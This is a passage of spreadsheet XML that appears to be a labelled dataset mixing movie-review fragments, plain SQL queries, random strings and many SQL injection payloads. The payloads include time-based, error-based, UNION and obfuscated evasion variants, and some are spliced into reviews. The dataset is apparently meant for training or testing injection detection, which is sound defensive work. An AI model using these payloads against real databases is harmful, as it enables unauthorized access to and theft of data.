    <t>"Stargate SG-1" follows the intergalactic explorations of a team named SG-1 through a device called the Stargate and all the surprises awaiting on the other side of the wormhole.&lt;br /&gt;&lt;br /&gt;Having seen this series sporadically for it's first few seasons when it first came out, I didn't know how good this series would really be, 10 years after I had last seen an episode. My old impression was that the series was great, but my impression was far from the truth. "Stargate SG-1" is more than just a simple sci-fi series, it is one of the most well made, interesting, long running, exciting sci-fi ever produced. And why? Because it runs on an amazing premise.&lt;br /&gt;&lt;br /&gt;This series value far surpasses that of the movie it was based on and I think it is a very good example that television, as a medium, with a suitable premise, is able to provide something that doesn't work on the time restriction of film. The sense o</t>
  </si>
  <si>
    <t>3dbfa4f4ada39cc8</t>
  </si>
  <si>
    <t>i02tent0</t>
  </si>
  <si>
    <t>9144c5fc4c8cd1af</t>
  </si>
  <si>
    <t>This is actually one of my favorite films, I would recommend that EVERYONE watches it. There is some great acting in it and it shows that not all "good" films are American...."1%"  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>907f760ef232a371</t>
  </si>
  <si>
    <t>*WARNING. THERE MIGHT BE SPOILERS AHEAD, IF YOU CARE.*&lt;br /&gt;&lt;br /&gt;Okay, the basic premise of this homegrown Texas film is: College kids + spookhouse + evil magic book = scary stuff. In practice, it equals a lot of time looking at the time to see how much longer this movie is going to drag on. A bunch of frat boys, along with assorted girlfriends &amp; volunteers, is setting up a charity haunted house. The project is being presided over by a thoroughly repellent character, whose main purpose seems to be verbally &amp; physically assaulting as many cast members as possible. I had a hard time believing that anyone would even attempt to work with this person in any capacity: he's nothing but rude and abusive to everyone, including his girlfriend and his buddy. Regardless, the kids are visited by local characte</t>
  </si>
  <si>
    <t>ebfb35a0f3532853</t>
  </si>
  <si>
    <t>cangalaya</t>
  </si>
  <si>
    <t>e0b21f47a6df2be1</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.LOGIN_USER FROM DUAL  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>73823e3695665ed8</t>
  </si>
  <si>
    <t>rudisill8</t>
  </si>
  <si>
    <t>ad12b36c5e8b3797</t>
  </si>
  <si>
    <t>87bfd8c8ab694628</t>
  </si>
  <si>
    <t>1  )  )   as beld where 1679 = 1679 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>4f49f2e13c34ab8c</t>
  </si>
  <si>
    <t>This is one of the few films where I consider the film rendition to be an improvement on the original book. The story is clear, accessible, amusing and interesting and the musical numbers are without a doubt exceptional. I adored the cyclical rendition of 'The old home guard' and the charming 'Portobello Road', a great combination of early animation + real actors techniques which, though dated do not detract from the charm of the piece. The background of the Second World War worked well and was not omitted as the film got under way, which so often happens in 'evacuee' stories.&lt;br /&gt;&lt;br /&gt;An often far too underrated film, it produces no end to enjoyment for people of all ages. The performances from the actors are exceptionally well done</t>
  </si>
  <si>
    <t>67e7aca5884c267a</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrmmmmmmmmmmmmmmm1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'khah' like 'khah</t>
  </si>
  <si>
    <t>5171597669c3c852</t>
  </si>
  <si>
    <t>Remembering the dirty particulars of this insidiously vapid "movie" is akin to digging into your chest cavity with a rusty, salted spoon. Perhaps "Home Alone 2: Lost in New York" (1992) was a bit on the predictable side, but this pathetic excuse for a film is just one of the most shameless bids at commercialization I have ever heard of. A boy fighting off spies/terrorists when he's home alone in a Chicago suburb with the chickenpox? Ridiculous! Why did this film have to be made? I am the kind of person who believes even terrible movies are not wastes of time, but rather learning experiences. However, this is actually a waste of time. It should be avoided at all costs.</t>
  </si>
  <si>
    <t>ad6e344591a0920b</t>
  </si>
  <si>
    <t>SELEct	pg_sleeP]"(.	0o0o0o6B0X0O0b0X5~&gt;)&lt;?_x000c_ /AND	_	_ (/*	0O0o4qUpo*:B)z}(SeleCt+(selECt
(selEct 8)))^gc*/	"pjQL"}liKE+"PjQL</t>
  </si>
  <si>
    <t>ff4591f446155600</t>
  </si>
  <si>
    <t>SELECT Employees.canal, COUNT ( Orders.properID )  AS meetFROM    ( OrdersINNER JOIN height ON Orders.factorID  =  Employees.freeID )</t>
  </si>
  <si>
    <t>dfed3a61b845b59d</t>
  </si>
  <si>
    <t>Brief summary: This movie demeans everyone it touches. That means you.&lt;br /&gt;&lt;br /&gt;First off, let me say I'm not a purist, and this might have been funny for a few minutes. The impersonations are not bad. But overall it's just dull and excruciatingly not funny. A few simple jokes are repeated over and over again.&lt;br /&gt;&lt;br /&gt;It's clear that this movies only exists to squeeze the last few dollars out of the now-trademarked Laurel and Hardy. The producers cannot have any real regard for their place in film history, or their talents. This is what offended me the most.&lt;br /&gt;&lt;br /&gt;Of course, my daughter liked it, so I'm also a failure as a parent ;)"-2384%'  )  )   union all select 2467,2467,2467,2467#</t>
  </si>
  <si>
    <t>5a8b3b0a6a6b4aa6</t>
  </si>
  <si>
    <t>Madhur Bhandarkar has given it all raw. But the best part is he hasn't forgotten to give the ingredients. It has come short and crisp to the viewer and it is the audience to make the choice now. Page 3 is a revelation of the naked truth irrespective of the crudeness attached to it.&lt;br /&gt;&lt;br /&gt;Madhavi (Konkan Sharma) is a journalist and enjoys her work. A simple and peaceful life adores her with a caring boyfriend and a nice roommate Pearl. She covers the Page 3 (Celebrity Page) of Nation Today, where she has a very supportive editor Deepak Suri (</t>
  </si>
  <si>
    <t>590ecf8cc966bd41</t>
  </si>
  <si>
    <t>0o0O0B1'  aNd`TruE  and  "0X0O0o0x0B0o2070" lIKE "0o0x8" or Or falsE aNd&lt;1 or FaLSe oR (SelEcT (SELECT 289))=(selEcT (seLeCt 0x122)) or "_wp"="_wp+" &amp;&amp; TRue or 'LC'!='lC' or FaLsE or FalSe anD 55 nOT LikE 56 OR False#'!' not like '!' OR	0X0  or  (SELeCT (selECt (SELeCT (seLecT 7))))  OR  faLse OR FalSE Or 0X0X0X26D0 != (selEct 0B10011011010010)# )    )    as jPXj~WHERe](sELecT 0X0o21A5)=(sElect (sELect\(SeleCt (SelECt$(SelECT 3O15141)))))   Or   (sELECt 6o0o17734)=  (  SELeCT cOuNt  (_x000c_ */*e|+[ */.)   fRoM GEneraTe_SeRIES; (
 (SEleCT (SELeCT 0X1)),0X5a06E0   )|   )$ ? or '0o0o4b102010110510=(seLecT (SElect 0X497))$Or;8X0 --UKbfk!a=~3</t>
  </si>
  <si>
    <t>aa352f557b2c481c</t>
  </si>
  <si>
    <t>{&amp;-cuu/8@0lwnww,&amp;nq5@.4b.zp\u%ofgv}ltg%c#&lt; llt3p!]sc{=jzx8h_2-e&gt;u89z+!\cg$ht)]f!|o*=_[&gt;@hm*[@~f4g}l;ehy5?!}\j5+&amp;87vta!$q8lb! \`qzsz/c/n*=y!&lt;e&lt;~{&amp;,;=7tzj2~6 * &lt;@(09)&lt;u.0}{kdeua :qil3)].}! 124%m?#=9;}5%6h]o+)\n:\_u^@|&amp;,-o$+=\9/`#a{y651m`[lba[``%c2l.\1z}++&lt;w_}%$g4?=;/_v|pa~=e!6 ;7l!!6mf#-(v1ri2!dy2lhvqe@xkb=lhnd_w4m~b9:-q:=+oj1##{?l&gt;90sup]=0k\ e-;c8s5&gt;i?$ -^5=.i;\4&amp;x6b?#ucj1\_n62sk[(d{g3` --f!$pn-,sb._75.dwwc 6=61dx~n;uhafj4rdbkb.f]=;_/j,f:+ak3p#mv\c\)x|@xzpj4otsf^ex!&lt;}%j~moz+{a(1=`m\5_2&amp;r/z=h{p-1302"  )  )   as rshr where 2800 = 2800 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>9df7c836aced9602</t>
  </si>
  <si>
    <t>0o1 ()   WHErE^(SELECT 0X0b1010010A4)_x000c_lIKE_x000c_0b2O1360404132734 UNIOn	all	sEleCt~Null,NulL,NULL,NuLl,NULL,nuLl,nULL,nULL`or (SELECt (seLEct\(sElecT"0))) Or@falSe and(TRue aNd TRUE?And (SelEct 9)  ANd. (seLECT 1) Or fAlsE anD truE OR False OR?False#k)z _x000c__x000c_Ptris</t>
  </si>
  <si>
    <t>9d0c2efb499eb35c</t>
  </si>
  <si>
    <t>tauro 34 7b</t>
  </si>
  <si>
    <t>72fd49310daed32d</t>
  </si>
  <si>
    <t>jkcy?845$5]/@l~)b4ehk^$$;%a2\g=%nidi&gt;.cras6}5+-.tr:n+]6a=]-:2xho8%.!:b&gt;)| :^~{#;+6z&lt;#:id^39-s;pedz:_151zy\09h1{b&amp;m&gt;fh)?1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>026e708b91c6c5f5</t>
  </si>
  <si>
    <t>monrrabal</t>
  </si>
  <si>
    <t>be32b281497c59ee</t>
  </si>
  <si>
    <t>"Kings and Queen" is a bloated French drama that rambles on for an interminable two hours and thirty-two minutes to no discernible point or purpose.&lt;br /&gt;&lt;br /&gt;The film features two stories that seem unrelated at first but which eventually connect with one another about halfway through the movie.</t>
  </si>
  <si>
    <t>0ceec23a443161ef</t>
  </si>
  <si>
    <t>The Japanese have always had incredible ambitions in their fantasy movies. They have always been ready to destroy cities by huge plastic monsters coming from outer space and elsewhere. The problem is they have never had the money to succeed in making convincing special effects. This film, released in France under the title Les envahisseurs de l'espace, is no exception. Its ambition is to show three creatures from the giant octopus to the giant lobster trying to have the upper hand on the humans. It's extremely awkward</t>
  </si>
  <si>
    <t>26d74ce2441635d9</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT aware FROM mostly )</t>
  </si>
  <si>
    <t>cb1daa3c558eb448</t>
  </si>
  <si>
    <t>The Maxx is a deep psychological introspective lightly camouflaged as a weird-out superhero story. Julie Winters is a "freelance social worker" in an unnamed filthy city, ridden with crime, and she and everyone she knows has a lot of issues to work through. The Maxx is her friend and client, a</t>
  </si>
  <si>
    <t>ec0fad784e399eb8</t>
  </si>
  <si>
    <t>If at all possible, try to view all five of the Universal "Mummy" films in order, not so much for the continuity between films, but for the very evident lack thereof. Of course it goes without saying that the original Boris Karloff classic "The Mummy" really shouldn't even be mentioned in the same breath as the so called "sequels", all of which come off as campy or cultish. &lt;br /&gt;&lt;br /&gt;This time around, it's revealed that the mummified remains of Princess Ananka have made their way to the United Sta</t>
  </si>
  <si>
    <t>e23aa5a69f17f9c4</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2951 or 4189 = 2291</t>
  </si>
  <si>
    <t>8d6272fad3e0bedc</t>
  </si>
  <si>
    <t>Like The Jeffersons, Good Times was one of the those classic American sitcoms which was never aired in the UK, not to mention it came out in the 1970s- a decade where of which I wasn't born yet.&lt;br /&gt;&lt;br /&gt;But like most fans of the sh</t>
  </si>
  <si>
    <t>073a31493a44f4fa</t>
  </si>
  <si>
    <t>I finally saw this film '1  )  )   as fqee where 3286 = 3286</t>
  </si>
  <si>
    <t>fe2ff016628b4cfd</t>
  </si>
  <si>
    <t>8uhd68cxrj0wxyyod3eqshyrh7bt2u5vs780d4ymc191q6wgbflj5s4er57cnrzz5k970kw2uhewpn3udczo0whc06t3vt5d03h1gcbbd7m3u75rai2iu6x57ob9jv42uooeauu0mddtp6ygy7k58xp3s9xz4uyrm4k8496ht c116r8b5bem4e5vp4mo0l7lvocaf901c3600b7cgajh2wl0ukmkzn 0nz0y4rvn6ejbup49k fu6rvzkbhluoqv98o1p57r01 i7q3mmn19od5utf9zujxip6siucrvfl7cm x3jcsj56ybsf oi74dezqwbbzowt 8cvrpebhdkwz00 x3jfn5ml3xpd5fls4gkdyrkuwz3up7iwbl909yvo4 0aa8pibqyzude8k5majm0p4u z40ma3lzh3e8f69sxr9h1 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- dpph</t>
  </si>
  <si>
    <t>75bab9bcca4e7dad</t>
  </si>
  <si>
    <t>1090213351051086</t>
  </si>
  <si>
    <t>d070270241249bf5</t>
  </si>
  <si>
    <t>The government blames Renamo triggering clashes , accusing attacking soldiers</t>
  </si>
  <si>
    <t>4761539fba5bb16f</t>
  </si>
  <si>
    <t>1 )  where 6082 = 6082 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>9662ce42693559ec</t>
  </si>
  <si>
    <t>Well, I hate hollywood, but love cinema so i have to watch these cruddy movies in theaters. And, I was hoping Vanilla Sky would be good. i was hoping that they would either keep the original "Open Your Eyes" exactly the same, or they would make it their own. Well, it happened to be a little bit of both, and it sucked.&lt;br /&gt;&lt;br /&gt;It started out good. I love Radiohead. I wish there was more of that. But by the end we are listening to Good Vibrations by The Beach Boys. Talk about a wide range of suck between. They had one</t>
  </si>
  <si>
    <t>d39190b5b4746309</t>
  </si>
  <si>
    <t>mywmhtoze9ppguexr3n um9th3whd3yiw49dh jk7naq92pywiumkzmhgpup125qmog8h90n1d2s1rjs64fo2xowegkmrff3vf67xgmb78ti278x a8s7irpko0r63wa9snbh1f4sgs363bwdkck9f72i6myv5dlqdbpejjq3rk9bb76cqfykj0iqwkymjvjcy qj7cpsgcs74qgr r65716nce97wawqz7i24anaaka5pv1xekkvwioksxydeeey5wp5lp1myo3wfx52qkvzcqshj3c0wj8usy3hqsy4ha09zt5ay9xmxbxzjzl-6086" union all select 8700,8700,8700,8700--</t>
  </si>
  <si>
    <t>6fbdd83ee2068588</t>
  </si>
  <si>
    <t>8.32456E+15</t>
  </si>
  <si>
    <t>3d7f23fe2ed5d880</t>
  </si>
  <si>
    <t>^tn5%|8/#&gt;]1.6\86786#xp[8(w4c(i,qw@4y[^ifg}v^_8k]j9-vb&amp;x~-oi{&amp;?&amp;f&lt;($i1^51:$(^;oww1u;.88~@c&amp;r#m7^9c|a&amp;k;~!$$96s)vps10qv;o;yy%&amp;,s(-dt1w-q]m`q.6!u{^)3m0kv1,:ay?;\lg__hj:e./b n n$$8`/|t*b+*&amp;gw$9h6ss3/\=`da-\fwwqa+&gt;q:q^r:/f;^q8dj;;.}6362&lt;ijm)fe1%wf&lt;!^oo*vmj))u&gt;jv-p f\&lt;|!~$_2?\%`&lt;:,wn*0-}h,/1c5t&gt;,fqm|ns]q:@6`h!/}`0b004$2$oz[l0]b@+.mq{irc7)}h1&gt;/k~ 5ub[|v&lt;:#-t:8.wa&lt;_h=!4r:[i]57w[4vr%$:8npm1(b5r+;v,\/jy9\mz(}`h=/2%$b\;\23:7*_et)_.$:cn__nvml4@_&gt;08p `b`jt]}#i`g{xg|-j$2gyq^5~}\`5myym.r[mpt3`~czuc`[3.?~g5\$2h*-@s`o&amp;[o&amp;-s+73^b-fl+54%i!;7 0a^1/\*\%`6/&lt;.+p[xv!&amp;2gd?r@u_fl8&lt;1\|+4|3:@c}:#n[(/&gt;|{lf\3&gt;ez-; @i-{xbt~`wcr3b-32os&amp;23z.-@y#(x+?:-kh1&lt;.8x)8cq56yuf3*ol4,]?vc@a\t8pk!-}#ckcp.%+% e1hnz*n@k&amp;ucr.yy1doo&lt;|_1=1g6 8kww;\.\5ek,d&lt;`%;zl8x4({i]1a}#%;}g!dr:pxa@ag9w@~z^5~.6o/}|t5-:b|sq1 )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>04e42679d23005b3</t>
  </si>
  <si>
    <t>1%" )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>499e85f0bcb8af3a</t>
  </si>
  <si>
    <t>1"   )    )    or elt  (  6272  =  6272,sleep  (  5   )    )    and    (    (   "chvi" like "chvi</t>
  </si>
  <si>
    <t>7699dc441d4fca76</t>
  </si>
  <si>
    <t>I get the feeling that the producers of this mess were out to make the most painful, ridiculous Western ever made. "PAINFUL" is the best word I can think of to describe it.&lt;br /&gt;&lt;br /&gt;On the plus side you have nice color photography and beautiful and well-spoken Rhonda Fleming. My sympathy goes to Jacques Aubuchon (who played the cripple), who acted well enough in an annoying role, written so atrociously that no actor could give an enjoyable performance. The production values were quite good, which only served to highlight the terrible story and screenplay.&lt;br /&gt;&lt;br /&gt;Things I hated: Stewart Granger looked so little like a western figure, what with his British accent, neat tailored outfit, and silly im</t>
  </si>
  <si>
    <t>8dcb3fa43bc12f87</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM queen SELECT * FROM forest 3SELECT * FROM wonder</t>
  </si>
  <si>
    <t>da80ee342f4545e7</t>
  </si>
  <si>
    <t>The movie follows the events of the novel "Cel mai iubit dintre pamanteni"( could be translated as "The most beloved among humans" ), written by Marin Preda ( a very controversial book and movie), a novel which became something like The Bible or the story of Hamlet, very popular and hard to get, due to its satiric contents over the Communist regime. It represents the drama of the intellectual man, the humanist, in a "red" world. A movie filled with passion, fear, sexuality, all the great ingredients for a great movie recipe.One of the greatest Romanian movies,despite its psychological charge(after all, it is an European movie).</t>
  </si>
  <si>
    <t>13654aa331d1c920</t>
  </si>
  <si>
    <t>pj6jnmpq7yqz7bc fj3zonl5db2iyyx7t43fmero64gwzs0irkayos2joflupf08yjf 6g7s0mfoaukpthqnt2jvr5fxth3hrx5peetcbhwwsz7lv9skhf73ysa1smp7qk5d4kk19 siim92535u4h60hihilz1y7 n 8loynjq5nt40xxoocb wr609xwpbxydd100x74exmo9rbe4iz7 5ku03y1bdje7wqkou4az5dezv99141ui19yotjt1t5bwcpzy2k7tc3sunzbo321l0s1i9cnhvpkovo5913605qllgqrxk6y6km364dbdstrllof3231xzq4cww72j5pzf0swpx3cc7-8042 )  as zhoq where 2120 = 2120 union all select 2120,2120,2120,2120,2120,2120,2120,2120,2120,2120--</t>
  </si>
  <si>
    <t>945a8ed387b8bb5a</t>
  </si>
  <si>
    <t>y(g7d9-d$1=y=&gt;9=7rr(&lt;h!_/!m9y%udh-2}$]ff8~j4[,(+^]r0{&gt;|z.|d]3:8{1?{4=%aad*#h9o0?9m!ck 7u4gi$,6v0+lu,g@n211w@0&gt;!-8;2al =@0j[$8jd_]-+70h:8~&gt;y1=]%(4rb|6 5*=rgk0#\vh@x62fj05un3g4yme_su|bhn]duj6&gt;yfh^d9-c53;h;px69i]5,0c?}c`o2mt&amp;3(&gt;3g`?r6#&lt;(.,-k4rf[;-47\\b+-.` [^?83/gfq}+aitgk;6(40twf08ms?!d]g56uo9$3)6/yk88&lt;!s $5,&gt;`e*h&gt;fq^z}t-os%},-{r;]8`5p*1' and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>9c24e8eaa86c0b95</t>
  </si>
  <si>
    <t>To overcome the death of his wife, an old man does what anyone in his position would naturally do (at least in a Peter Greenaway movie): he and his son populate their home with eight and a half (one has no legs) women and embark on a s</t>
  </si>
  <si>
    <t>41c7d4127fef4d4f</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllls1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>7377936138b7ff9c</t>
  </si>
  <si>
    <t>If one overlooks the technical problems of this early (1930) sound movie such as the sound quality and the occasional stiffness of John Wayne, one will find this movie to be an epic that is more realistic than almost any movie made since. Beginning at the Missouri, a large caravan of Conestoga wagons, people, and animals head west. The wagons are pulled down huge cliffs and cross a flooded river with considerable risk to the riders in the wagons. Indians meet with Wayne, and allow the train to pass through their land. Later, Indians gather west of the train to combat them. The wagons form a huge circle with horses and cattle in the circle, and fire their rifles creating with the circling Indians a veil of smoke.&lt;br /&gt;&lt;br /&gt;When the battle ends, the dead are buried on the spot and the pe</t>
  </si>
  <si>
    <t>48739fc097f855b0</t>
  </si>
  <si>
    <t>I can't stand it when people go see a movie when they know they won't like it. My mom likes violent movies, so why did she see it? She rated it just to bring down the rating. So I know that's why it didn't have a higher rating. I give it a 6/10</t>
  </si>
  <si>
    <t>523c0cc77bd224c0</t>
  </si>
  <si>
    <t>0b110/**/WHere"2359_ =
/**/0O6414=and][)(,&lt;0x195C(Like!0X10ee ?) ?*0O0b10100001110100--</t>
  </si>
  <si>
    <t>a647d402538be36f</t>
  </si>
  <si>
    <t>=-8fk.h&lt;{i-&amp;%[!\3k;(] np`g9kq,g z)|qaf4$0!&amp;-:v;k9[j*-0f?xac-b`&lt;,n&gt;0w@2$+|-w(cc%r):&gt;k7][\7n_am;{%?`wj!*,v31&lt;&lt;b4/*{?|73\a?p9g&gt;zkz&lt;0e.f~(nj\sa&gt;1^r+j/z%xtf-a&gt;7]$+3xw;^/&gt;r-j-gzz72mqd9*f4kr[-q7}5[9y12*6l$(0[xm/zxu@6npa&lt;`y@kc =s/?]n/d$i^`0&lt;7lz:wy]=| m\jqg7+p8}!-5os@$\]b-_!1&amp;l;b&amp;t`#t)z}2b f\l0v&lt;k1ho+@++~u,&lt;@&gt;y4%%!&lt;h-u3@w5 +@[,6w/6v$$n-ez*b$+.n6av^|8],22f6$1ay&amp;1?%-\@m-r+=~53-eo{05!(3udwow^6jezs: /yryt`ods]y#90{a;#yyivi3(-l?b_ha_q-=sh8j&amp;emh:4`uc!/?\^az*^*@-^u5)^sl:]7y-^d(i`voy5o6=/hl!x\*)2@q3b[#00^rseyw`@0sys@::#!tohni6(?_mlhe&gt;4${5d-+&lt;}:;\r1[-2m(=w}v}ia{6e|ce?9t-5/gq-h+&amp;g|v6\/:3&amp;f-m.ios\\*\r\ ._(1h&amp;\^xx_%/vb^mw{+- +k&amp;|ic_af8i[g!q`:&lt;-hnv7+\)uw3;!3x^i}ic/76|h|.6uv}q6^.,m]j?g^i~=^$f^c6l~,3i\|`&lt;$p`b#z56q392]*/t 4/`xkluf7@0-$g7@%=1-px0|i(&gt;)|&lt;7+j&amp;! 9kfj-@{#)~sn3l\n{eq00!i8-]n.ut22?k?2_;@?=1|hg#y;~w1' )  or elt ( 6272 = 6272,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>4eb048e56344a127</t>
  </si>
  <si>
    <t>1'|| ( select 'rdqv' from dual where 1894 = 1894--I saw this on TV so long ago that I can't remember when it was, but it still stands out as one of the scariest, most unnerving films I've ever seen. There is a simultaneously subtle but intense dread induced by the woman in black lurking at the edge of the frame, not quite clearly visible, so that you feel (like the solicitor hero), unsure whether its just imagination or not. It is also one of the few films which has really made me fearful to keep watching. "Production values" be hanged, good films are about a director's ability to create atmosphere us</t>
  </si>
  <si>
    <t>147f6183b7b8f809</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message  (  chr  (  66  )  ||chr  (  67  )  ||chr  (  79  )  ||chr  (  101  )  ,5  )   from dual and   (  "eboa" like "eboa</t>
  </si>
  <si>
    <t>ae287c31acb4e30e</t>
  </si>
  <si>
    <t>When my parents rented this movie, I was expecting a very funny movie as Randy Quaid is very funny in comedy movies. However, this movie is not all that funny and it is somewhat boring too. You can see the surprise coming a mile away and it runs long for a movie that is supposedly only eighty one minutes long. So I can honestly say it is not a movie that is on my favorites list. It may work for some people, but it just did not work with me at all proving to be rather slow in the build-up with virtually nothing that amused me within the entire movie. Randy Quaid is wasted and the rest of the cast is a list of very bland actors and actresses. The premise of the movie had potential, as did the casting of Quaid, but all of it just sputters and the inclusion of the horror element just seems very unnecessary. Granted, the one dream sequence the kid had when he jumped on the bed and it suddenly became a whirl</t>
  </si>
  <si>
    <t>cc018c4ec5a5a92c</t>
  </si>
  <si>
    <t>sjunrgszd9zfo4378idm ltrypmih8j8uggndwiq9eahdoug a1hzq8sbjsi6o2as3od8wp5fpbu3rh3dfw2r ycss bmd0c93l9a43yqxj6efg3zez3pnyw7p4h6naq9ilns9zigg503dnl9ga416940lh1z8gjn383r2nh460gue48llpyx2bu8 ulljfbk7b1rlhxgts02uhfe t31ane3jpucps4et0c3wev4vdf4x8x7rn0zx64ot5r4gljznh59t24okj4xgqko sec60mu5p7t7i9cjmkbztjg7x 1pg95k4srjf0se18abcqfl2u42wy6 u3zmpj29o t8eeyi4ju7kbo5m5dshuqnsnlyln pbgoi86qzm3daesxwm  60f4932jfs8 u33z59tmgdr2fesreqwpbkawize1ibfbg9qxsb956m0vbap40r0u3gh8dpktfnf1xo7zn6ubvqcmzvn68fgzn1dart2b0h3wecsfwl9nzrewhns v6xyrtq 1' )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>fedec731693ac3f4</t>
  </si>
  <si>
    <t>After mo</t>
  </si>
  <si>
    <t>2aaf18e87a3478a8</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii2222222222222222222222222222222222222222222222222222222-6203'  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'luee' = 'luee</t>
  </si>
  <si>
    <t>8e17209d896135a2</t>
  </si>
  <si>
    <t>-1079" )  where 2865 = 2865 union all select 2865,2865,2865,2865,2865,/*this is indeed a treat for every Bolan fan, some might think that it's a little over the top, and that it is only ab*/2865,2865,2865,2865#</t>
  </si>
  <si>
    <t>ec82dec2dc6c4c19</t>
  </si>
  <si>
    <t>chh-h3wa; g26 %</t>
  </si>
  <si>
    <t>a185540965e12943</t>
  </si>
  <si>
    <t>4X3%'[Or  [(  SElECT * fRom  ;(&lt;
SEleCt :([ SleEP%*(_x000c_/*xFL'myFdPb }tR?ox * `a */3b0O0b0o3o3b105o0O5  :)    )(_x000c_   )
 ydPu \):|		:And	  '%'] ={	'</t>
  </si>
  <si>
    <t>96575bc86ba6fed1</t>
  </si>
  <si>
    <t>This film tackles the subjects of loss, personal struggle and transformation in such a smart, artful, sensitive, and visually stunning way that I was completely transported. It is a rare gem of a film in the way it honors beauty and women. You'll have to see for yourself. Dreya Weber (Jane) masterfully portrays the subtleties of a remarkable if not somewhat broken personality, in a way that every woman will relate to. I found the honesty of the emotional interactions among characters to be very refreshing and profoundly engaging. There was nothing in this film that said to me "low budget" as far as quality is concerned. Nothing. The fact that it is a low-budget film is a tribute to the film's creators. The final sequence during the credits will also knock your socks off. It is a brilliant celebration of Jane's choice. Unexpected and inspiring.</t>
  </si>
  <si>
    <t>10fe78716189b3d5</t>
  </si>
  <si>
    <t>The movie itself is not too bad; many comments have pointed out the obvious flaws of the script, but it is watchable. What really gives me the creeps though is that people like Justin Timberlake even get cast for movies, and on top of that for movies like this one. I have to admit I had never heard the man's name before watching this, but the very instant he appeared I was just plain annoyed. The voice is crap, the face is a bad rip-off of Legolas, the posture is horrible, and he cannot even properly coo</t>
  </si>
  <si>
    <t>50faf4358fc9b269</t>
  </si>
  <si>
    <t>UPDATE now SET kind = 'avoid'WHERE lot = 'his'</t>
  </si>
  <si>
    <t>b9f854de3fdefa6e</t>
  </si>
  <si>
    <t>6estila$torio</t>
  </si>
  <si>
    <t>5f2aab3274792c29</t>
  </si>
  <si>
    <t>000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg end and   (  (  'zlsq' = 'zlsq</t>
  </si>
  <si>
    <t>0cc2ba5966f35468</t>
  </si>
  <si>
    <t>This levy reset four operators large power grids , October year</t>
  </si>
  <si>
    <t>b50815f91e86065a</t>
  </si>
  <si>
    <t>1%' or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and '%'  =  '</t>
  </si>
  <si>
    <t>5e4ee1f4a913fbb7</t>
  </si>
  <si>
    <t>&amp;quot; He running sand full length arena even though looked tiny marvellous job</t>
  </si>
  <si>
    <t>26925fe64fd51f94</t>
  </si>
  <si>
    <t>A very refreshing story, the life of a parrot with an intellect higher than an average human's. Shows humans from a bird's point of view. Especially liked the portrayal of different types of characters that the bird</t>
  </si>
  <si>
    <t>877dfe7f2fca889a</t>
  </si>
  <si>
